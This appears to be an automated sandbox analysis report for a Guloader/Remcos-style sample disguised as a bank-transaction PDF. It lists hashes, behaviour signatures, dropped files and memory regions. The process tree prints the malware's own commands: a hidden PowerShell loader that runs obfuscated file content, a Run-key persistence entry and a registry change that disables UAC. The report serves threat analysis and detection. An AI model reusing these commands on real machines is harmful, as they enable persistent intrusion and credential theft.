Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    10-07-2024 08:39

General

  • Target

    pko_trans_details_20240710_105339·pdf.exe

  • Size

    477KB

  • MD5

    c601d5e720a191b1e304c8bcbf63b675

  • SHA1

    80133fe77b17d44886e6201d7723be90489a55d2

  • SHA256

    d7325eb4553b2c58a8580cb84af63cfe5cdf4ff23a3d4e09a963c656d5717d8c

  • SHA512

    2a78f640f01f365d23bb45bfc96e6900eb1814804bbf905876ac9d6e9353fd3e648efc08858b9e29e41eb6c2262e528d34b00d847524aeeabf41eb319792566f

  • SSDEEP

    6144:39X0GFlllllllqllllllllllllhllllYllltlld0wz/ypzAJP8xvP2nWaLcAqRFk:R0Nwzy4EP2nWaPqzJgBKjYl92gCU3Bbl

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • UAC bypass 3 TTPs 1 IoCs
  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 3 IoCs
  • Blocklisted process makes network request 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Loads dropped DLL 4 IoCs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe
    "C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2444
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Forhrt=Get-Content 'C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San';$Forset=$Forhrt.SubString(45874,3);.$Forset($Forhrt)"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2284
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1884
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"
          4⤵
          • Adds Run key to start application
          • Modifies registry key
          PID:2876
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1072
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • Modifies registry key
          PID:1496
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\spihmgmddbbjigpockgw"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1776
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\djnamyferjtolmmslutqajl"
        3⤵
        • Accesses Microsoft Outlook accounts
        PID:2336
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\fltsnrpyfrlbvbawufgrkogwrg"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2216

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat

    Filesize

    130B

    MD5

    e607cf77e798eb275450c3cda5efeb1c

    SHA1

    0b3602942f3d9ad7e1f1ef979ebe589dbc8a8862

    SHA256

    9751f67592c212d9ec4b500087a13140f1feb12af149c0ccbbed240328d71011

    SHA512

    59e4cb59341bca7c436eac0e6e471e52dea263d829fc9c498cd9eabdc6808b6f15931b8a6068e32cfc170ea39ddf4f3bdb300ef937f5aedbb419ea5ee77dd411

  • C:\Users\Admin\AppData\Local\Temp\spihmgmddbbjigpockgw

    Filesize

    2B

    MD5

    f3b25701fe362ec84616a93a45ce9998

    SHA1

    d62636d8caec13f04e28442a0a6fa1afeb024bbb

    SHA256

    b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

    SHA512

    98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

  • C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San

    Filesize

    67KB

    MD5

    bf1ebfd1285dd7ef43a587e9f51a8e33

    SHA1

    1dede4026611e9f40c91d9bbe406a06b2fd8bfa4

    SHA256

    de1db1c0a065f580b4fe878c5b363933e45ec7f0c06118d29b6d167af24189ff

    SHA512

    3b7b11a8989a0b46e4091c8e4c81e71a2454fc9fba77618d844653d548ecd59a2c8b8fce3338fa499ca84da8664f7e34f355ab8b18e3507598f5f63dd3a80389

  • C:\Users\Admin\AppData\Local\kilns\Unobtainably\Polemoniaceae11.Non

    Filesize

    310KB

    MD5

    afc1982fff88592a55312010cfc773c6

    SHA1

    c57e918c5149ca9c2a331a78ecef84ffc667feb7

    SHA256

    02a71af4b95cf275ba0430022e9c2665bd1e4ddb3177202c1c3059901eefd4f0

    SHA512

    f4acf46244cb0115e0666a631af6dd2e7400478103cd9c152e48307a2239108e7e6bf3b39467747b3efa8b0fbdc59216ad6a26ec5587c19bb56fb4512233117e

  • \Users\Admin\AppData\Local\Temp\nso47AB.tmp\BgImage.dll

    Filesize

    7KB

    MD5

    521df745a41f0b8164ffd01717cacbba

    SHA1

    dc7a9eacfbeb1fae52091da5e80db6cb1b6bce74

    SHA256

    dbf91707fa157603bea025a6411cdcb497ab11262c9c18b14dc431a45aa17c0b

    SHA512

    c5b1ba062872a8f534e2f0eac57fc3c0d8be9cda79605d86566d67260ba5477444a0ddfed1838b4fb14c677e5342c8419a88fcd38147dbaa36ac1f9e00c52bbe

  • \Users\Admin\AppData\Local\Temp\nso47AB.tmp\UserInfo.dll

    Filesize

    4KB

    MD5

    acbda33dd5700c122e2fe48e3d4351fd

    SHA1

    2c154baf7c64052ee712b7cdf9c36b7697dd3fc8

    SHA256

    943b33829f9013e4d361482a5c8981ba20a7155c78691dbe02a8f8cd2a02efa0

    SHA512

    d090adf65a74ac5b910b18bb67e989714335e7b4778cd771cff154d7186351a1bebbc7103cca849bdfa2709c991947ffff6c1d8fdf16a74f4dfb614bce3ff6fd

  • \Users\Admin\AppData\Local\Temp\nso47AB.tmp\nsDialogs.dll

    Filesize

    9KB

    MD5

    1c8b2b40c642e8b5a5b3ff102796fb37

    SHA1

    3245f55afac50f775eb53fd6d14abb7fe523393d

    SHA256

    8780095aa2f49725388cddf00d79a74e85c9c4863b366f55c39c606a5fb8440c

    SHA512

    4ff2dc83f640933162ec8818bb1bf3b3be1183264750946a3d949d2e7068ee606277b6c840193ef2b4663952387f07f6ab12c84c4a11cae9a8de7bd4e7971c57

  • memory/1776-73-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/1776-82-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/1776-74-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/1776-78-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/2216-84-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/2216-80-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/2216-83-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/2284-33-0x00000000737B0000-0x0000000073D5B000-memory.dmp

    Filesize

    5.7MB

  • memory/2284-31-0x00000000737B0000-0x0000000073D5B000-memory.dmp

    Filesize

    5.7MB

  • memory/2284-30-0x00000000737B1000-0x00000000737B2000-memory.dmp

    Filesize

    4KB

  • memory/2284-40-0x00000000737B0000-0x0000000073D5B000-memory.dmp

    Filesize

    5.7MB

  • memory/2284-94-0x0000000010000000-0x0000000010019000-memory.dmp

    Filesize

    100KB

  • memory/2284-43-0x00000000062B0000-0x000000000AE6C000-memory.dmp

    Filesize

    75.7MB

  • memory/2284-41-0x00000000737B0000-0x0000000073D5B000-memory.dmp

    Filesize

    5.7MB

  • memory/2284-65-0x00000000062B0000-0x000000000AE6C000-memory.dmp

    Filesize

    75.7MB

  • memory/2284-95-0x0000000010000000-0x0000000010019000-memory.dmp

    Filesize

    100KB

  • memory/2284-38-0x00000000737B0000-0x0000000073D5B000-memory.dmp

    Filesize

    5.7MB

  • memory/2284-91-0x0000000010000000-0x0000000010019000-memory.dmp

    Filesize

    100KB

  • memory/2284-37-0x00000000737B0000-0x0000000073D5B000-memory.dmp

    Filesize

    5.7MB

  • memory/2284-34-0x00000000737B0000-0x0000000073D5B000-memory.dmp

    Filesize

    5.7MB

  • memory/2284-32-0x00000000737B0000-0x0000000073D5B000-memory.dmp

    Filesize

    5.7MB

  • memory/2336-75-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/2336-77-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/2336-81-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/2336-76-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB